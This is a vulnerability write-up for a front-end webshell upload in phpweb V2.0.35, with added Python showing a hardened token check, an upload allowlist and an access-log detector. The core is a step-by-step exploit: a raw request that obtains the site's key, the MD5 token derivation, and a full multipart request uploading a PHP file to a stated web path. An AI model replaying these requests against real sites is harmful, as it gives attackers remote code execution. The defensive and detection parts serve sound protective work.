phpweb front-end getshell

Affected scope

Version 2.0.35

Test environment:

Windows 2008 + PHPnow 1.6.5 + phpweb V2.0.35

Key derivation and verification scheme

<?php
// The key is derived purely from the database credentials (reversed, then MD5),
// and the same value is returned by the act=appcode request shown below.
$k=md5(strrev($dbUser.$dbPass));
$h=$_SERVER["HTTP_REFERER"];
$t=$_POST["t"];      // client-supplied, never checked for freshness
$m=$_POST["m"];      // client-supplied token
$act=$_POST["act"];
$path=$_POST["path"];

// Expected token is md5(k . t); anyone who knows k can compute it for any t.
$md5=md5($k.$t);
if($m!=$md5){
        echo "ERROR: 安全性校验错误"; // "ERROR: security check failed"
}
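To make the weakness of this scheme concrete, here is an added Python example (not code from the page or from phpweb) that models the check exactly as shown above and places a hardened verifier beside it. DB_USER and DB_PASS are constructed sample values; the hardened design (a random per-install secret that is never sent to clients, an HMAC instead of bare MD5, a freshness window on t, constant-time comparison, and an extension allowlist for the upload handler) is an assumed mitigation, not a description of any phpweb release.

```python
import hashlib
import hmac
import os

# Constructed sample credentials standing in for $dbUser / $dbPass; not real values.
DB_USER = "root"
DB_PASS = "secret"


def weak_key(db_user: str, db_pass: str) -> str:
    """Mirror of $k = md5(strrev($dbUser . $dbPass)): a pure function of the
    database credentials, and also handed out by the act=appcode endpoint,
    so it is effectively public."""
    return hashlib.md5((db_user + db_pass)[::-1].encode()).hexdigest()


def weak_token(k: str, t: str) -> str:
    """Mirror of $md5 = md5($k . $t)."""
    return hashlib.md5((k + t).encode()).hexdigest()


def weak_verify(k: str, t: str, m: str) -> bool:
    """Mirror of the page's check. t is client-chosen and never checked for
    freshness, and k is known, so a match proves nothing about the sender."""
    return m == weak_token(k, t)


# Hardened variant (assumed design): secret never derived from credentials and
# never returned to a client; HMAC-SHA256; t must be a recent Unix timestamp.
SERVER_SECRET = os.urandom(32)
MAX_AGE_SECONDS = 300


def hardened_token(t: str, secret: bytes = SERVER_SECRET) -> str:
    """Token the server itself issues for a timestamp t."""
    return hmac.new(secret, t.encode(), hashlib.sha256).hexdigest()


def hardened_verify(t: str, m: str, now: int, secret: bytes = SERVER_SECRET) -> bool:
    """Accept only a well-formed, fresh t whose HMAC matches (constant-time)."""
    try:
        ts = int(t)
    except ValueError:
        return False
    if not 0 <= now - ts <= MAX_AGE_SECONDS:
        return False
    return hmac.compare_digest(hardened_token(t, secret), m)


# Upload-handler allowlist: the token check alone does not decide what may be
# written to a web-served directory.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def accept_upload_name(filename: str) -> bool:
    """Refuse script extensions anywhere in the name (configs.php, x.php.jpg)
    and require the final extension to be on the allowlist."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) < 2:
        return False
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXTENSIONS
```

Even with the hardened token, the directories that receive uploads should be served with script execution disabled, so that a file slipping past the name check is still never run as PHP.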

Vulnerability detection method

1. Obtain the secret key

POST /3151/base/post.php HTTP/1.1
Host: 192.168.59.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

act=appcode

Key obtained: k=01a5b56136714988a0aa6d13cb73f82a&t=1579150020

The value of k with the character 'a' appended, then MD5-hashed: a6bd1d895fc946ed8d6a2446890cb7ce

2. Apply MD5

3. Upload the webshell

A shell uploaded through appfile.php is stored at /effect/source/bg/<filename>.php
A shell uploaded through appplus.php is stored at /update/ /<filename>.php

POST /3151//base/appfile.php HTTP/1.1
Host: 192.168.59.138
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCznr39h1oUlUvOGG
Accept: */*
Referer: http://192.168.59.138/3151//base/appfile.php
Accept-Language: zh-cn
Cookie: Hm_lvt_a93ba41c8cfa578d8fa3f514694f399b=1570960058;
Host: 192.168.59.138
Content-Length: 726


------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-dAta;name='file';fIlename='configs.php'
Content-Type: application/octet-stream


------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='t'

a
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='m'

a6bd1d895fc946ed8d6a2446890cb7ce
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='act'

upload
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='r_size'

28
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='submit'

getshell
------WebKitFormBoundaryCznr39h1oUlUvOGG--

4. Webshell obtained successfully
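The sequence above leaves a recognisable trace in ordinary web-server access logs: a POST to base/post.php (the key endpoint), a POST to base/appfile.php or base/appplus.php from the same client shortly afterwards, and then a request for a .php file under /effect/source/bg/ or /update/. The following Python is an added detection example, not code from the page; the log lines are constructed in Apache/nginx "combined" format, 192.168.59.1 is an assumed client address, and the paths follow the write-up. Access logs do not carry POST bodies, so the act=appcode parameter itself is not visible here; body-level matching would need proxy or WAF logs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines (combined format). 192.168.59.1 is an assumed client.
LOG_LINES = [
    '192.168.59.1 - - [16/Jan/2020:13:27:00 +0800] "POST /3151/base/post.php HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    '192.168.59.1 - - [16/Jan/2020:13:27:05 +0800] "POST /3151//base/appfile.php HTTP/1.1" 200 25 "http://192.168.59.138/3151//base/appfile.php" "Mozilla/5.0"',
    '192.168.59.1 - - [16/Jan/2020:13:27:09 +0800] "GET /3151/effect/source/bg/configs.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [16/Jan/2020:13:30:00 +0800] "GET /3151/index.php?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Key endpoint, the two upload handlers, and the upload directories named on the page.
KEY_ENDPOINT = re.compile(r"/base/post\.php$")
UPLOAD_ENDPOINTS = re.compile(r"/base/app(?:file|plus)\.php$")
UPLOAD_DIR_SCRIPT = re.compile(r"/(?:effect/source/bg|update)/[^/]+\.php$", re.I)


def parse_line(line):
    """Return ip, ts (aware datetime), method, status and a normalised path, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = rec["path"].split("?", 1)[0]
    rec["path"] = re.sub(r"/+", "/", path)  # collapse the '//' seen in the write-up's request
    return rec


def detect(lines, window=timedelta(minutes=10)):
    """Two rules: (1) POST to the key endpoint followed within `window` by a POST
    to an upload handler from the same client; (2) any request for a .php file
    inside an upload directory. Returns (rule, ip, path) tuples in log order."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    last_key_fetch = {}  # ip -> time of its most recent POST to base/post.php
    findings = []
    for e in events:
        ip, path = e["ip"], e["path"]
        if e["method"] == "POST" and KEY_ENDPOINT.search(path):
            last_key_fetch[ip] = e["ts"]
        elif e["method"] == "POST" and UPLOAD_ENDPOINTS.search(path):
            t0 = last_key_fetch.get(ip)
            if t0 is not None and e["ts"] - t0 <= window:
                findings.append(("key-fetch-then-upload", ip, path))
        if UPLOAD_DIR_SCRIPT.search(path):
            findings.append(("php-in-upload-dir", ip, path))
    return findings


if __name__ == "__main__":
    for finding in detect(LOG_LINES):
        print(*finding)
```

Rule (2) is the stronger signal on its own, since there is no legitimate reason for a PHP file to be requested from these upload directories; rule (1) catches the preparation step even before a shell is called. On a patched install the same two rules remain useful as a check that the upload directories are not serving scripts.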
